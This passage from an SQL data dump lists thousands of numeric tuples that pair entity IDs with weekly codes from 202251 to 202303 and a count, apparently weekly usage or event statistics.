),(2159,1,'202251',8),(2658,1,'202251',8),(2769,1,'202251',8),(2804,1,'202251',8),(3005,1,'202251',8),(3261,1,'202251',8),(4238,1,'202251',8),(4529,1,'202251',8),(4674,1,'202251',8),(4700,1,'202251',8),(5037,1,'202251',8),(5076,1,'202251',8),(5128,1,'202251',8),(5140,1,'202251',8),(1718,1,'202251',9),(1766,1,'202251',9),(2911,1,'202251',9),(3023,1,'202251',9),(3313,1,'202251',9),(74,1,'202251',10),(108,1,'202251',10),(487,1,'202251',10),(570,1,'202251',10),(1544,1,'202251',10),(1604,1,'202251',10),(1606,1,'202251',10),(1737,1,'202251',10),(3066,1,'202251',10),(4338,1,'202251',10),(4524,1,'202251',10),(5134,1,'202251',10),(87,1,'202251',11),(1588,1,'202251',11),(4412,1,'202251',11),(2457,1,'202251',12),(2503,1,'202251',12),(4645,1,'202251',12),(4677,1,'202251',12),(472,1,'202251',13),(1608,1,'202251',13),(3083,1,'202251',13),(4663,1,'202251',13),(76,1,'202251',15),(1600,1,'202251',15),(2809,1,'202251',15),(3764,1,'202251',15),(4457,1,'202251',15),(4930,1,'202251',16),(4520,1,'202251',17),(5163,1,'202251',17),(3781,1,'202251',18),(3030,1,'202251',19),(68,1,'202251',20),(84,1,'202251',20),(91,1,'202251',20),(1582,1,'202251',20),(1602,1,'202251',20),(72,1,'202251',21),(1612,1,'202251',21),(2904,1,'202251',21),(1586,1,'202251',24),(1594,1,'202251',24),(89,1,'202251',26),(1610,1,'202251',26),(80,1,'202251',92),(9,1,'202251',595),(106,1,'202252',1),(110,1,'202252',1),(476,1,'202252',1),(1780,1,'202252',1),(4792,1,'202252',1),(4862,1,'202252',1),(4866,1,'202252',1),(4883,1,'202252',1),(478,1,'202252',2),(1590,1,'202252',2),(1705,1,'202252',2),(1734,1,'202252',2),(2063,1,'202252',2),(2148,1,'202252',2),(2156,1,'202252',2),(2161,1,'202252',2),(2296,1,'202252',2),(3229,1,'202252',2),(3261,1,'202252',2),(3265,1,'202252',2),(3267,1,'202252',2),(3273,1,'202252',2),(3749,1,'202252',2),(4387,1,'202252',2),(4404,1,'202252',2),(4420,1,'202252',2),(4432,1,'202252',2),(4440,1,'202252',2),(4668,1,'202252',2),(4797,1,'202252',2),(4802,1,'202252',2),(479,1,'202252',3),(1584,1,'202252',3),(1697,1,'202252',3),(1699,1,'202252',3),(1709,1,'202252',3),(1715,1,'202252',3),(1720,1,'202252',3),(1728,1,'202252',3),(1730,1,'202252',3),(1732,1,'202252',3),(1739,1,'202252',3),(1751,1,'202252',3),(1768,1,'202252',3),(1782,1,'202252',3),(2152,1,'202252',3),(2159,1,'202252',3),(2297,1,'202252',3),(2704,1,'202252',3),(2748,1,'202252',3),(2956,1,'202252',3),(3041,1,'202252',3),(3090,1,'202252',3),(3117,1,'202252',3),(3243,1,'202252',3),(3245,1,'202252',3),(3247,1,'202252',3),(3253,1,'202252',3),(3257,1,'202252',3),(3263,1,'202252',3),(3275,1,'202252',3),(3278,1,'202252',3),(3282,1,'202252',3),(3287,1,'202252',3),(3313,1,'202252',3),(3438,1,'202252',3),(3479,1,'202252',3),(3482,1,'202252',3),(3721,1,'202252',3),(3727,1,'202252',3),(3738,1,'202252',3),(4329,1,'202252',3),(4363,1,'202252',3),(4377,1,'202252',3),(4382,1,'202252',3),(4391,1,'202252',3),(4436,1,'202252',3),(4514,1,'202252',3),(4517,1,'202252',3),(4648,1,'202252',3),(4685,1,'202252',3),(4688,1,'202252',3),(4694,1,'202252',3),(4762,1,'202252',3),(4893,1,'202252',3),(4897,1,'202252',3),(5020,1,'202252',3),(102,1,'202252',4),(467,1,'202252',4),(471,1,'202252',4),(477,1,'202252',4),(480,1,'202252',4),(481,1,'202252',4),(483,1,'202252',4),(1711,1,'202252',4),(1713,1,'202252',4),(1718,1,'202252',4),(1724,1,'202252',4),(1743,1,'202252',4),(1747,1,'202252',4),(1770,1,'202252',4),(1772,1,'202252',4),(1774,1,'202252',4),(1776,1,'202252',4),(2154,1,'202252',4),(2293,1,'202252',4),(2558,1,'202252',4),(2911,1,'202252',4),(2965,1,'202252',4),(2991,1,'202252',4),(3034,1,'202252',4),(3045,1,'202252',4),(3087,1,'202252',4),(3092,1,'202252',4),(3097,1,'202252',4),(3104,1,'202252',4),(3109,1,'202252',4),(3124,1,'202252',4),(3249,1,'202252',4),(3251,1,'202252',4),(3280,1,'202252',4),(3285,1,'202252',4),(3486,1,'202252',4),(3534,1,'202252',4),(3710,1,'202252',4),(3714,1,'202252',4),(3752,1,'202252',4),(3771,1,'202252',4),(3774,1,'202252',4),(4275,1,'202252',4),(4323,1,'202252',4),(4335,1,'202252',4),(4341,1,'202252',4),(4368,1,'202252',4),(4396,1,'202252',4),(4400,1,'202252',4),(4408,1,'202252',4),(4416,1,'202252',4),(4448,1,'202252',4),(4546,1,'202252',4),(4556,1,'202252',4),(4582,1,'202252',4),(4591,1,'202252',4),(4612,1,'202252',4),(4651,1,'202252',4),(4654,1,'202252',4),(4681,1,'202252',4),(4712,1,'202252',4),(4722,1,'202252',4),(4744,1,'202252',4),(4765,1,'202252',4),(4768,1,'202252',4),(4858,1,'202252',4),(4988,1,'202252',4),(5037,1,'202252',4),(5042,1,'202252',4),(5101,1,'202252',4),(5125,1,'202252',4),(5146,1,'202252',4),(5157,1,'202252',4),(5248,1,'202252',4),(472,1,'202252',5),(485,1,'202252',5),(488,1,'202252',5),(1695,1,'202252',5),(1703,1,'202252',5),(1707,1,'202252',5),(1722,1,'202252',5),(1741,1,'202252',5),(1745,1,'202252',5),(1778,1,'202252',5),(2150,1,'202252',5),(2165,1,'202252',5),(2252,1,'202252',5),(2609,1,'202252',5),(2617,1,'202252',5),(2769,1,'202252',5),(2801,1,'202252',5),(2993,1,'202252',5),(3006,1,'202252',5),(3027,1,'202252',5),(3038,1,'202252',5),(3063,1,'202252',5),(3079,1,'202252',5),(3096,1,'202252',5),(3107,1,'202252',5),(3127,1,'202252',5),(3240,1,'202252',5),(3259,1,'202252',5),(3269,1,'202252',5),(3271,1,'202252',5),(3297,1,'202252',5),(3316,1,'202252',5),(3489,1,'202252',5),(3498,1,'202252',5),(3531,1,'202252',5),(3731,1,'202252',5),(3746,1,'202252',5),(4238,1,'202252',5),(4326,1,'202252',5),(4357,1,'202252',5),(4373,1,'202252',5),(4412,1,'202252',5),(4424,1,'202252',5),(4454,1,'202252',5),(4542,1,'202252',5),(4551,1,'202252',5),(4566,1,'202252',5),(4657,1,'202252',5),(4750,1,'202252',5),(4756,1,'202252',5),(4870,1,'202252',5),(4874,1,'202252',5),(4878,1,'202252',5),(4888,1,'202252',5),(4976,1,'202252',5),(4980,1,'202252',5),(4983,1,'202252',5),(5024,1,'202252',5),(5028,1,'202252',5),(5050,1,'202252',5),(5054,1,'202252',5),(5062,1,'202252',5),(5122,1,'202252',5),(5128,1,'202252',5),(484,1,'202252',6),(1592,1,'202252',6),(1604,1,'202252',6),(1726,1,'202252',6),(1749,1,'202252',6),(1766,1,'202252',6),(2248,1,'202252',6),(2751,1,'202252',6),(2775,1,'202252',6),(3004,1,'202252',6),(3072,1,'202252',6),(3102,1,'202252',6),(3226,1,'202252',6),(3430,1,'202252',6),(3541,1,'202252',6),(3724,1,'202252',6),(3742,1,'202252',6),(4301,1,'202252',6),(4332,1,'202252',6),(4444,1,'202252',6),(4587,1,'202252',6),(4608,1,'202252',6),(4691,1,'202252',6),(4706,1,'202252',6),(4741,1,'202252',6),(4771,1,'202252',6),(4776,1,'202252',6),(5046,1,'202252',6),(5067,1,'202252',6),(5140,1,'202252',6),(5153,1,'202252',6),(474,1,'202252',7),(482,1,'202252',7),(486,1,'202252',7),(1606,1,'202252',7),(1701,1,'202252',7),(2813,1,'202252',7),(2964,1,'202252',7),(2989,1,'202252',7),(3290,1,'202252',7),(4660,1,'202252',7),(4697,1,'202252',7),(4703,1,'202252',7),(4709,1,'202252',7),(4747,1,'202252',7),(4753,1,'202252',7),(4759,1,'202252',7),(4977,1,'202252',7),(5033,1,'202252',7),(5076,1,'202252',7),(5131,1,'202252',7),(74,1,'202252',8),(1614,1,'202252',8),(2804,1,'202252',8),(3023,1,'202252',8),(3307,1,'202252',8),(3735,1,'202252',8),(3777,1,'202252',8),(4524,1,'202252',8),(4529,1,'202252',8),(5071,1,'202252',8),(468,1,'202252',9),(487,1,'202252',9),(1544,1,'202252',9),(1737,1,'202252',9),(2178,1,'202252',9),(2309,1,'202252',9),(4428,1,'202252',9),(4674,1,'202252',9),(4996,1,'202252',9),(470,1,'202252',10),(473,1,'202252',10),(4663,1,'202252',10),(5080,1,'202252',10),(91,1,'202252',11),(570,1,'202252',11),(1598,1,'202252',11),(1600,1,'202252',11),(3066,1,'202252',11),(4520,1,'202252',11),(4677,1,'202252',11),(5137,1,'202252',11),(76,1,'202252',12),(108,1,'202252',12),(335,1,'202252',12),(469,1,'202252',12),(1588,1,'202252',12),(2503,1,'202252',12),(2809,1,'202252',12),(3060,1,'202252',12),(5058,1,'202252',12),(5134,1,'202252',12),(84,1,'202252',13),(1582,1,'202252',13),(4645,1,'202252',13),(4700,1,'202252',13),(4930,1,'202252',13),(87,1,'202252',14),(3083,1,'202252',14),(4338,1,'202252',14),(1608,1,'202252',15),(3005,1,'202252',15),(3781,1,'202252',15),(4457,1,'202252',15),(72,1,'202252',16),(1596,1,'202252',16),(2457,1,'202252',16),(3069,1,'202252',16),(5163,1,'202252',16),(1612,1,'202252',17),(2658,1,'202252',17),(3030,1,'202252',18),(3764,1,'202252',18),(68,1,'202252',19),(1594,1,'202252',19),(1602,1,'202252',19),(1586,1,'202252',20),(1610,1,'202252',21),(2904,1,'202252',29),(89,1,'202252',33),(80,1,'202252',98),(9,1,'202252',666),(1743,1,'202301',1),(3063,1,'202301',1),(3104,1,'202301',1),(3430,1,'202301',1),(1749,1,'202301',2),(1776,1,'202301',2),(1782,1,'202301',2),(3087,1,'202301',2),(3090,1,'202301',2),(3107,1,'202301',2),(3109,1,'202301',2),(3253,1,'202301',2),(3267,1,'202301',2),(3287,1,'202301',2),(3290,1,'202301',2),(3316,1,'202301',2),(4424,1,'202301',2),(4546,1,'202301',2),(4893,1,'202301',2),(5067,1,'202301',2),(106,1,'202301',3),(110,1,'202301',3),(1697,1,'202301',3),(1709,1,'202301',3),(1747,1,'202301',3),(1768,1,'202301',3),(1778,1,'202301',3),(1780,1,'202301',3),(2150,1,'202301',3),(2248,1,'202301',3),(3034,1,'202301',3),(3041,1,'202301',3),(3079,1,'202301',3),(3092,1,'202301',3),(3097,1,'202301',3),(3127,1,'202301',3),(3229,1,'202301',3),(3259,1,'202301',3),(3261,1,'202301',3),(3263,1,'202301',3),(3275,1,'202301',3),(3278,1,'202301',3),(3285,1,'202301',3),(3297,1,'202301',3),(3731,1,'202301',3),(3746,1,'202301',3),(4275,1,'202301',3),(4301,1,'202301',3),(4332,1,'202301',3),(4373,1,'202301',3),(4382,1,'202301',3),(4404,1,'202301',3),(4514,1,'202301',3),(4591,1,'202301',3),(4648,1,'202301',3),(4792,1,'202301',3),(4858,1,'202301',3),(4862,1,'202301',3),(4870,1,'202301',3),(4878,1,'202301',3),(5062,1,'202301',3),(5071,1,'202301',3),(478,1,'202301',4),(1703,1,'202301',4),(1707,1,'202301',4),(1720,1,'202301',4),(1734,1,'202301',4),(1770,1,'202301',4),(1772,1,'202301',4),(1774,1,'202301',4),(2152,1,'202301',4),(2159,1,'202301',4),(2165,1,'202301',4),(2252,1,'202301',4),(2293,1,'202301',4),(2609,1,'202301',4),(2617,1,'202301',4),(2956,1,'202301',4),(2993,1,'202301',4),(3096,1,'202301',4),(3251,1,'202301',4),(3265,1,'202301',4),(3479,1,'202301',4),(3486,1,'202301',4),(3541,1,'202301',4),(3724,1,'202301',4),(3771,1,'202301',4),(3774,1,'202301',4),(3777,1,'202301',4),(4341,1,'202301',4),(4357,1,'202301',4),(4368,1,'202301',4),(4396,1,'202301',4),(4400,1,'202301',4),(4408,1,'202301',4),(4436,1,'202301',4),(4517,1,'202301',4),(4566,1,'202301',4),(4608,1,'202301',4),(4668,1,'202301',4),(4712,1,'202301',4),(4750,1,'202301',4),(4753,1,'202301',4),(4759,1,'202301',4),(4776,1,'202301',4),(4797,1,'202301',4),(4802,1,'202301',4),(4883,1,'202301',4),(4888,1,'202301',4),(4977,1,'202301',4),(4980,1,'202301',4),(4983,1,'202301',4),(5028,1,'202301',4),(5050,1,'202301',4),(5157,1,'202301',4),(102,1,'202301',5),(479,1,'202301',5),(480,1,'202301',5),(1695,1,'202301',5),(1699,1,'202301',5),(1705,1,'202301',5),(1713,1,'202301',5),(1715,1,'202301',5),(1718,1,'202301',5),(1730,1,'202301',5),(1741,1,'202301',5),(1766,1,'202301',5),(2148,1,'202301',5),(2154,1,'202301',5),(2704,1,'202301',5),(2748,1,'202301',5),(2751,1,'202301',5),(2804,1,'202301',5),(2991,1,'202301',5),(3045,1,'202301',5),(3117,1,'202301',5),(3226,1,'202301',5),(3245,1,'202301',5),(3247,1,'202301',5),(3249,1,'202301',5),(3257,1,'202301',5),(3269,1,'202301',5),(3271,1,'202301',5),(3273,1,'202301',5),(3282,1,'202301',5),(3313,1,'202301',5),(3438,1,'202301',5),(3489,1,'202301',5),(3531,1,'202301',5),(3534,1,'202301',5),(3710,1,'202301',5),(3735,1,'202301',5),(3742,1,'202301',5),(3752,1,'202301',5),(4238,1,'202301',5),(4329,1,'202301',5),(4363,1,'202301',5),(4387,1,'202301',5),(4432,1,'202301',5),(4542,1,'202301',5),(4587,1,'202301',5),(4651,1,'202301',5),(4681,1,'202301',5),(4685,1,'202301',5),(4688,1,'202301',5),(4691,1,'202301',5),(4703,1,'202301',5),(4741,1,'202301',5),(4744,1,'202301',5),(4747,1,'202301',5),(4866,1,'202301',5),(5020,1,'202301',5),(5024,1,'202301',5),(5046,1,'202301',5),(5054,1,'202301',5),(5101,1,'202301',5),(5153,1,'202301',5),(467,1,'202301',6),(471,1,'202301',6),(481,1,'202301',6),(1590,1,'202301',6),(1606,1,'202301',6),(1701,1,'202301',6),(1711,1,'202301',6),(1724,1,'202301',6),(1732,1,'202301',6),(1737,1,'202301',6),(1739,1,'202301',6),(1745,1,'202301',6),(2063,1,'202301',6),(2156,1,'202301',6),(2801,1,'202301',6),(2964,1,'202301',6),(2965,1,'202301',6),(2989,1,'202301',6),(3004,1,'202301',6),(3006,1,'202301',6),(3023,1,'202301',6),(3027,1,'202301',6),(3038,1,'202301',6),(3124,1,'202301',6),(3240,1,'202301',6),(3280,1,'202301',6),(3482,1,'202301',6),(3714,1,'202301',6),(3721,1,'202301',6),(3727,1,'202301',6),(3749,1,'202301',6),(4335,1,'202301',6),(4377,1,'202301',6),(4440,1,'202301',6),(4524,1,'202301',6),(4556,1,'202301',6),(4612,1,'202301',6),(4709,1,'202301',6),(4756,1,'202301',6),(4768,1,'202301',6),(4897,1,'202301',6),(5042,1,'202301',6),(5058,1,'202301',6),(5146,1,'202301',6),(74,1,'202301',7),(84,1,'202301',7),(469,1,'202301',7),(476,1,'202301',7),(483,1,'202301',7),(485,1,'202301',7),(488,1,'202301',7),(1584,1,'202301',7),(1726,1,'202301',7),(1751,1,'202301',7),(2161,1,'202301',7),(2296,1,'202301',7),(2911,1,'202301',7),(3243,1,'202301',7),(3307,1,'202301',7),(4326,1,'202301',7),(4338,1,'202301',7),(4412,1,'202301',7),(4416,1,'202301',7),(4428,1,'202301',7),(4454,1,'202301',7),(4520,1,'202301',7),(4529,1,'202301',7),(4706,1,'202301',7),(4762,1,'202301',7),(4874,1,'202301',7),(4988,1,'202301',7),(5122,1,'202301',7),(5125,1,'202301',7),(5248,1,'202301',7),(470,1,'202301',8),(472,1,'202301',8),(477,1,'202301',8),(482,1,'202301',8),(484,1,'202301',8),(1592,1,'202301',8),(1614,1,'202301',8),(1722,1,'202301',8),(1728,1,'202301',8),(2178,1,'202301',8),(2297,1,'202301',8),(2558,1,'202301',8),(2813,1,'202301',8),(4323,1,'202301',8),(4420,1,'202301',8),(4444,1,'202301',8),(4448,1,'202301',8),(4551,1,'202301',8),(4582,1,'202301',8),(4654,1,'202301',8),(4660,1,'202301',8),(4697,1,'202301',8),(4722,1,'202301',8),(4771,1,'202301',8),(4930,1,'202301',8),(5037,1,'202301',8),(5080,1,'202301',8),(468,1,'202301',9),(473,1,'202301',9),(474,1,'202301',9),(486,1,'202301',9),(1588,1,'202301',9),(2457,1,'202301',9),(2658,1,'202301',9),(2775,1,'202301',9),(3060,1,'202301',9),(3066,1,'202301',9),(3069,1,'202301',9),(3498,1,'202301',9),(4657,1,'202301',9),(4700,1,'202301',9),(4976,1,'202301',9),(4996,1,'202301',9),(570,1,'202301',10),(3102,1,'202301',10),(4677,1,'202301',10),(4765,1,'202301',10),(5033,1,'202301',10),(5076,1,'202301',10),(5128,1,'202301',10),(5131,1,'202301',10),(5137,1,'202301',10),(108,1,'202301',11),(1604,1,'202301',11),(2309,1,'202301',11),(3072,1,'202301',11),(3738,1,'202301',11),(4391,1,'202301',11),(4663,1,'202301',11),(4694,1,'202301',11),(5134,1,'202301',11),(487,1,'202301',12),(1596,1,'202301',12),(4674,1,'202301',12),(5140,1,'202301',12),(1544,1,'202301',13),(1598,1,'202301',13),(1600,1,'202301',13),(2769,1,'202301',13),(3030,1,'202301',13),(1608,1,'202301',14),(1610,1,'202301',14),(2809,1,'202301',14),(5163,1,'202301',14),(87,1,'202301',15),(1594,1,'202301',15),(76,1,'202301',16),(335,1,'202301',16),(1582,1,'202301',16),(3005,1,'202301',16),(2503,1,'202301',17),(4645,1,'202301',17),(3083,1,'202301',18),(3764,1,'202301',18),(4457,1,'202301',19),(91,1,'202301',21),(89,1,'202301',22),(1602,1,'202301',22),(3781,1,'202301',22),(68,1,'202301',27),(1612,1,'202301',29),(72,1,'202301',31),(1586,1,'202301',37),(2904,1,'202301',39),(80,1,'202301',87),(9,1,'202301',658),(102,1,'202302',1),(110,1,'202302',1),(476,1,'202302',1),(478,1,'202302',1),(481,1,'202302',1),(482,1,'202302',1),(483,1,'202302',1),(1695,1,'202302',1),(1699,1,'202302',1),(1707,1,'202302',1),(1713,1,'202302',1),(1720,1,'202302',1),(1741,1,'202302',1),(1749,1,'202302',1),(1772,1,'202302',1),(1776,1,'202302',1),(2063,1,'202302',1),(2148,1,'202302',1),(2252,1,'202302',1),(2751,1,'202302',1),(2965,1,'202302',1),(2991,1,'202302',1),(3079,1,'202302',1),(3109,1,'202302',1),(3124,1,'202302',1),(3249,1,'202302',1),(3267,1,'202302',1),(3271,1,'202302',1),(3738,1,'202302',1),(3749,1,'202302',1),(4329,1,'202302',1),(4363,1,'202302',1),(4368,1,'202302',1),(4373,1,'202302',1),(4382,1,'202302',1),(4387,1,'202302',1),(4404,1,'202302',1),(4440,1,'202302',1),(4514,1,'202302',1),(4582,1,'202302',1),(4681,1,'202302',1),(4685,1,'202302',1),(4691,1,'202302',1),(4712,1,'202302',1),(4744,1,'202302',1),(4753,1,'202302',1),(4759,1,'202302',1),(4771,1,'202302',1),(4878,1,'202302',1),(4883,1,'202302',1),(4976,1,'202302',1),(4996,1,'202302',1),(5020,1,'202302',1),(5042,1,'202302',1),(5050,1,'202302',1),(5146,1,'202302',1),(5153,1,'202302',1),(467,1,'202302',2),(471,1,'202302',2),(477,1,'202302',2),(485,1,'202302',2),(488,1,'202302',2),(1697,1,'202302',2),(1709,1,'202302',2),(1715,1,'202302',2),(1718,1,'202302',2),(1730,1,'202302',2),(1734,1,'202302',2),(1743,1,'202302',2),(1774,1,'202302',2),(1782,1,'202302',2),(2152,1,'202302',2),(2154,1,'202302',2),(2161,1,'202302',2),(2165,1,'202302',2),(2248,1,'202302',2),(2558,1,'202302',2),(2911,1,'202302',2),(2956,1,'202302',2),(2964,1,'202302',2),(2989,1,'202302',2),(3027,1,'202302',2),(3063,1,'202302',2),(3104,1,'202302',2),(3117,1,'202302',2),(3229,1,'202302',2),(3245,1,'202302',2),(3247,1,'202302',2),(3261,1,'202302',2),(3265,1,'202302',2),(3278,1,'202302',2),(3280,1,'202302',2),(3297,1,'202302',2),(3479,1,'202302',2),(3498,1,'202302',2),(3534,1,'202302',2),(3721,1,'202302',2),(3735,1,'202302',2),(4275,1,'202302',2),(4335,1,'202302',2),(4338,1,'202302',2),(4377,1,'202302',2),(4408,1,'202302',2),(4424,1,'202302',2),(4432,1,'202302',2),(4517,1,'202302',2),(4546,1,'202302',2),(4648,1,'202302',2),(4657,1,'202302',2),(4668,1,'202302',2),(4677,1,'202302',2),(4688,1,'202302',2),(4697,1,'202302',2),(4722,1,'202302',2),(4741,1,'202302',2),(4747,1,'202302',2),(4762,1,'202302',2),(4765,1,'202302',2),(4768,1,'202302',2),(4858,1,'202302',2),(4862,1,'202302',2),(4893,1,'202302',2),(4977,1,'202302',2),(5033,1,'202302',2),(5046,1,'202302',2),(5054,1,'202302',2),(5058,1,'202302',2),(5101,1,'202302',2),(5122,1,'202302',2),(5125,1,'202302',2),(469,1,'202302',3),(480,1,'202302',3),(486,1,'202302',3),(1590,1,'202302',3),(1598,1,'202302',3),(1728,1,'202302',3),(1745,1,'202302',3),(1768,1,'202302',3),(1770,1,'202302',3),(1778,1,'202302',3),(2178,1,'202302',3),(2609,1,'202302',3),(2617,1,'202302',3),(2801,1,'202302',3),(3006,1,'202302',3),(3023,1,'202302',3),(3034,1,'202302',3),(3072,1,'202302',3),(3087,1,'202302',3),(3096,1,'202302',3),(3097,1,'202302',3),(3107,1,'202302',3),(3226,1,'202302',3),(3243,1,'202302',3),(3253,1,'202302',3),(3273,1,'202302',3),(3313,1,'202302',3),(3316,1,'202302',3),(3438,1,'202302',3),(3486,1,'202302',3),(3714,1,'202302',3),(3771,1,'202302',3),(3777,1,'202302',3),(4326,1,'202302',3),(4332,1,'202302',3),(4341,1,'202302',3),(4400,1,'202302',3),(4436,1,'202302',3),(4448,1,'202302',3),(4529,1,'202302',3),(4556,1,'202302',3),(4591,1,'202302',3),(4651,1,'202302',3),(4660,1,'202302',3),(4792,1,'202302',3),(4797,1,'202302',3),(4802,1,'202302',3),(4866,1,'202302',3),(4870,1,'202302',3),(4980,1,'202302',3),(4988,1,'202302',3),(5067,1,'202302',3),(5248,1,'202302',3),(472,1,'202302',4),(479,1,'202302',4),(1584,1,'202302',4),(1608,1,'202302',4),(1711,1,'202302',4),(1722,1,'202302',4),(1726,1,'202302',4),(2159,1,'202302',4),(2296,1,'202302',4),(2704,1,'202302',4),(2775,1,'202302',4),(2804,1,'202302',4),(3045,1,'202302',4),(3090,1,'202302',4),(3092,1,'202302',4),(3275,1,'202302',4),(3285,1,'202302',4),(3287,1,'202302',4),(3482,1,'202302',4),(3710,1,'202302',4),(3724,1,'202302',4),(3731,1,'202302',4),(3742,1,'202302',4),(3746,1,'202302',4),(3752,1,'202302',4),(4301,1,'202302',4),(4323,1,'202302',4),(4357,1,'202302',4),(4412,1,'202302',4),(4428,1,'202302',4),(4520,1,'202302',4),(4566,1,'202302',4),(4608,1,'202302',4),(4663,1,'202302',4),(4756,1,'202302',4),(4888,1,'202302',4),(5062,1,'202302',4),(5071,1,'202302',4),(5076,1,'202302',4),(484,1,'202302',5),(1544,1,'202302',5),(2297,1,'202302',5),(2748,1,'202302',5),(2813,1,'202302',5),(3004,1,'202302',5),(3041,1,'202302',5),(3307,1,'202302',5),(3430,1,'202302',5),(4238,1,'202302',5),(4416,1,'202302',5),(4420,1,'202302',5),(4454,1,'202302',5),(4524,1,'202302',5),(4612,1,'202302',5),(4703,1,'202302',5),(4776,1,'202302',5),(5037,1,'202302',5),(5131,1,'202302',5),(487,1,'202302',6),(1600,1,'202302',6),(1614,1,'202302',6),(1724,1,'202302',6),(1751,1,'202302',6),(1766,1,'202302',6),(3038,1,'202302',6),(3127,1,'202302',6),(3531,1,'202302',6),(3764,1,'202302',6),(4444,1,'202302',6),(4542,1,'202302',6),(4551,1,'202302',6),(4587,1,'202302',6),(4645,1,'202302',6),(4654,1,'202302',6),(4700,1,'202302',6),(4874,1,'202302',6),(5128,1,'202302',6),(5140,1,'202302',6),(5157,1,'202302',6),(473,1,'202302',7),(2309,1,'202302',7),(3060,1,'202302',7),(4674,1,'202302',7),(4694,1,'202302',7),(5080,1,'202302',7),(468,1,'202302',8),(570,1,'202302',8),(1596,1,'202302',8),(1604,1,'202302',8),(1703,1,'202302',8),(1737,1,'202302',8),(2658,1,'202302',8),(3005,1,'202302',8),(3069,1,'202302',8),(3290,1,'202302',8),(4706,1,'202302',8),(4709,1,'202302',8),(5137,1,'202302',8),(474,1,'202302',9),(2457,1,'202302',9),(2503,1,'202302',9),(2809,1,'202302',9),(4391,1,'202302',9),(4457,1,'202302',9),(5134,1,'202302',9),(74,1,'202302',10),(1606,1,'202302',10),(2769,1,'202302',10),(3030,1,'202302',10),(3066,1,'202302',10),(108,1,'202302',11),(1588,1,'202302',11),(1592,1,'202302',11),(1610,1,'202302',11),(3083,1,'202302',11),(84,1,'202302',12),(87,1,'202302',12),(335,1,'202302',12),(5163,1,'202302',12),(470,1,'202302',13),(4930,1,'202302',13),(3102,1,'202302',15),(3781,1,'202302',15),(72,1,'202302',17),(1582,1,'202302',17),(1612,1,'202302',18),(1594,1,'202302',19),(76,1,'202302',20),(68,1,'202302',21),(91,1,'202302',25),(1602,1,'202302',27),(2904,1,'202302',27),(89,1,'202302',30),(1586,1,'202302',30),(80,1,'202302',106),(9,1,'202302',647),(106,1,'202303',1),(110,1,'202303',1),(1697,1,'202303',1),(1705,1,'202303',1),(1707,1,'202303',1),(1715,1,'202303',1),(1720,1,'202303',1),(1732,1,'202303',1),(1734,1,'202303',1),(1739,1,'202303',1),(1741,1,'202303',1),(1745,1,'202303',1),(1770,1,'202303',1),(1776,1,'202303',1),(2152,1,'202303',1),(2161,1,'202303',1),(2165,1,'202303',1),(2297,1,'202303',1),(3087,1,'202303',1),(3127,1,'202303',1),(3269,1,'202303',1),(3278,1,'202303',1),(3280,1,'202303',1),(3430,1,'202303',1),(3735,1,'202303',1),(3746,1,'202303',1),(3752,1,'202303',1),(4424,1,'202303',1),(4428,1,'202303',1),(4608,1,'202303',1),(4651,1,'202303',1),(4654,1,'202303',1),(4883,1,'202303',1),(570,1,'202303',2),(1695,1,'202303',2),(1709,1,'202303',2),(1711,1,'202303',2),(1713,1,'202303',2),(1743,1,'202303',2),(1749,1,'202303',2),(1780,1,'202303',2),(2063,1,'202303',2),(2150,1,'202303',2),(2154,1,'202303',2),(2159,1,'202303',2),(2248,1,'202303',2),(2252,1,'202303',2),(2296,1,'202303',2),(2558,1,'202303',2),(2609,1,'202303',2),(2804,1,'202303',2),(2993,1,'202303',2),(3097,1,'202303',2),(3107,1,'202303',2),(3109,1,'202303',2),(3124,1,'202303',2),(3245,1,'202303',2),(3265,1,'202303',2),(3282,1,'202303',2),(3287,1,'202303',2),(3297,1,'202303',2),(3479,1,'202303',2),(3482,1,'202303',2),(3486,1,'202303',2),(3531,1,'202303',2),(3721,1,'202303',2),(3727,1,'202303',2),(3731,1,'202303',2),(3742,1,'202303',2),(3749,1,'202303',2),(3771,1,'202303',2),(4338,1,'202303',2),(4373,1,'202303',2),(4382,1,'202303',2),(4400,1,'202303',2),(4404,1,'202303',2),(4416,1,'202303',2),(4432,1,'202303',2),(4440,1,'202303',2),(4444,1,'202303',2),(4648,1,'202303',2),(4722,1,'202303',2),(4741,1,'202303',2),(4744,1,'202303',2),(4747,1,'202303',2),(4756,1,'202303',2),(4802,1,'202303',2),(4858,1,'202303',2),(4862,1,'202303',2),(4866,1,'202303',2),(4888,1,'202303',2),(4977,1,'202303',2),(476,1,'202303',3),(482,1,'202303',3),(488,1,'202303',3),(1606,1,'202303',3),(1701,1,'202303',3),(1747,1,'202303',3),(1768,1,'202303',3),(1772,1,'202303',3),(2617,1,'202303',3),(2748,1,'202303',3),(2751,1,'202303',3),(2801,1,'202303',3),(2964,1,'202303',3),(2965,1,'202303',3),(2991,1,'202303',3),(3041,1,'202303',3),(3045,1,'202303',3),(3063,1,'202303',3),(3096,1,'202303',3),(3117,1,'202303',3),(3243,1,'202303',3),(3249,1,'202303',3),(3253,1,'202303',3),(3257,1,'202303',3),(3261,1,'202303',3),(3263,1,'202303',3),(3273,1,'202303',3),(3275,1,'202303',3),(3285,1,'202303',3),(3316,1,'202303',3),(3724,1,'202303',3),(3774,1,'202303',3),(3777,1,'202303',3),(4275,1,'202303',3),(4332,1,'202303',3),(4357,1,'202303',3),(4363,1,'202303',3),(4368,1,'202303',3),(4387,1,'202303',3),(4396,1,'202303',3),(4408,1,'202303',3),(4436,1,'202303',3),(4542,1,'202303',3),(4582,1,'202303',3),(4591,1,'202303',3),(4657,1,'202303',3),(4668,1,'202303',3),(4691,1,'202303',3),(4753,1,'202303',3),(4762,1,'202303',3),(4768,1,'202303',3),(4874,1,'202303',3),(4893,1,'202303',3),(4980,1,'202303',3),(5037,1,'202303',3),(5046,1,'202303',3),(5054,1,'202303',3),(5062,1,'202303',3),(102,1,'202303',4),(478,1,'202303',4),(484,1,'202303',4),(485,1,'202303',4),(486,1,'202303',4),(1590,1,'202303',4),(1724,1,'202303',4),(1774,1,'202303',4),(1778,1,'202303',4),(2156,1,'202303',4),(2309,1,'202303',4),(2775,1,'202303',4),(2809,1,'202303',4),(2813,1,'202303',4),(3006,1,'202303',4),(3023,1,'202303',4),(3027,1,'202303',4),(3038,1,'202303',4),(3079,1,'202303',4),(3090,1,'202303',4),(3104,1,'202303',4),(3229,1,'202303',4),(3240,1,'202303',4),(3251,1,'202303',4),(3267,1,'202303',4),(3271,1,'202303',4),(3290,1,'202303',4),(3313,1,'202303',4),(3498,1,'202303',4),(3534,1,'202303',4),(3541,1,'202303',4),(4301,1,'202303',4),(432